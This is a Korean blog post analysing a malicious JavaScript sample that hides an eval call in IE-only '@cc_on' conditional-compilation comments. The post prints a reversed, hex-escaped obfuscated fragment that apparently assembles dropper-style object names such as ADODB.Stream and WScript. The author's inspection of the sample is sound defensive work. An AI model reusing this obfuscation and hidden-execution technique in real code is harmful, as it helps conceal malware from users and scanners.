@cc_on 문(JavaScript)
스크립트에서 주석 내의 조건부 컴파일 지원을 활성화 +_+
몇일전 확인했던 자바스크립트 코드에 아래 문구가 확인되었다
/*@cc_on
eval(avhPdzBix);
@*/
나름 추리해서 이넘이 코드를 실수 했구나..
어리석은 생각을..
결국 IE 환경에선 해당 코드가 실행되는 구조다
괜한 걱정을
코드의 가장 하단부분 확인
요즘 자바스크립트 코드는 두번씩 꼬는게 특징인가 보다
reverse() 함수로 보기 어렵게 해놓다니..
rav\n;"n56x\\l" = mq rav\n;"ht76x\\" = gedotdarq rav\n;"27x\\C" = ecapsetihwxelfq rav\n;"56x\\ta56x\\" = modnarq rav\n;"36x\\ej26x\\O" = deerdq rav\n;)1(]"tA"+"27x\\"+"ahc"[keppelq = sdnetq rav;"DvTtN" = keppelq rav\n;"24x\\DODA" = ssorcaq rav\n;"47x\\S." = tsilslianbmuhtoq rav\n;"ma56x\\r" = cthq rav\n;"e07x\\97x\\47x\\" = rerednerq rav\n;"srah34x\\" = imq rav\n;"t56x\\" = eixodr rav\n;"ne07x\\o" = gsmr rav\n;"46x\\aoL" = suidarelcitrapr rav\n;"64x\\mor64x\\" = dnenoisillocr rav\n;"ec6x\\i" = mr rav;};keppelr nruter{)keppelr(gedotdarr noitcnuf\n;"56x\\R" = modnarr rav\n;"d16x\\" = deerdr rav\n;"47x\\87x\\eT" = sdnetr rav\n;"l36x\\" = ssorcar rav\n;"56x\\sf6x\\" = tsilslianbmuhtor rav\n;"ta56x\\rC" = cthr rav\n;"bO56x\\" = rerednerr rav\n;"47x\\c56x\\j" = imr rav\n;"OD14x\\" = eixods rav\n;"24x\\D" = gsms rav\n;"47x\\S." = suidarelcitraps rav\n;"56x\\r" = dnenoisillocs rav\n;"m16x\\" = ms rav\n;"e07x\\y47x\\" = gedotdars rav\n;"86x\\C" = keppels rav\n;"27x\\a" = ecapsetihwxelfs rav\n;"te37x\\" = modnars rav\n;"nepf6x\\" = deerds rav\n;"ir77x\\" = sdnets rav\n;"87x\\eTe47x\\" = ssorcas rav\n;"47x\\" = tsilslianbmuhtos rav\n;"56x\\vaS" = ims rav\n;"c6x\\iFf6x\\T" = eixodt rav\n;)0(]"tA"+"27x\\"+"ahc"[reredners = gsmt rav;"J2e" = reredners rav\n;"ol36x\\" = suidarelcitrapt rav\n;"e37x\\" = dnenoisilloct rav\n;"nec6x\\" = gedotdart rav\n;"47x\\g" = keppelt rav\n;)1(]"tA"+"27x\\"+"ahc"[mt = ecapsetihwxelft rav;"qhL" = mt rav\n;"tgn56x\\l" = modnart rav\n;"86x\\" = deerdt rav' ["split"]('')["reverse"]()["join"]('');
/*@cc_on
eval(avhPdzBix);
@*/
콘솔로그로 IE 환경에서 정상 동작 확인
/*@cc_on
console.log(avhPdzBix);
//eval(avhPdzBix);
@*/
암튼 오늘 배운 교훈
악성 스크립트 작성자는 다 생각이 있어서 만들었구나..
@cc_on 문(JavaScript) 상세정보 확인 주소
https://msdn.microsoft.com/ko-kr/library/8ka90k2e(v=vs.94).aspx
- 16.05.26 어느날 -
'공부 > 콤퓨타' 카테고리의 다른 글
피싱사이트 확인 (0) | 2016.06.03 |
---|---|
Angler EK (0) | 2016.05.26 |
GET /CHANGELOG.txt (0) | 2016.05.25 |
메일 첨부파일 확인 (0) | 2016.05.17 |
Magnitude EK (0) | 2016.04.11 |